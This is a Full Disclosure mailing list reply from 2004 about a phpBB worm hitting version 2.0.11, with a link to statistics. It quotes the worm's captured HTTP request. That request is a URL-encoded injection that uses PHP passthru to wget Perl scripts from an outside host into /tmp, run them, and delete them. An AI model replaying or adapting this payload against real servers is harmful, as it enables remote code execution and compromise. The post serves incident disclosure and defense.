Full Disclosure mailing list archives

Re: Re: new phpBB worm affects 2.0.11

From: Paul Laudanski <zx () castlecops com>
Date: Wed, 29 Dec 2004 12:42:42 -0500 (EST)

Here are some samples of what this one does, and some statistics on 
300,000 hits in 55 hours:

http://castlecops.com/article-5642-nested-0-0.html

On Sat, 25 Dec 2004, Adam wrote:

The request for this one (even against a non phpBB scripts) appears to 
look like this:

"GET 
/?p=comments&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20crowklan.mine.nu/~pillar/.zk/coll;perl%20coll;wget%20crowklan.mine.nu/~pillar/.zk/aol;perl%20aol;rm%20-rf%20aol.*;rm%20-rf%20coll*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
 
HTTP/1.1"


-- 
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

new phpBB worm affects 2.0.11 Herman Sheremetyev (Dec 25)
- Re: new phpBB worm affects 2.0.11 Andrew Farmer (Dec 26)
- Re: new phpBB worm affects 2.0.11 ^^MAg^^ (Dec 27)
- Re: new phpBB worm affects 2.0.11 Andrew Farmer (Dec 27)
- <Possible follow-ups>
- Re: Re: new phpBB worm affects 2.0.11 Paul Laudanski (Dec 29)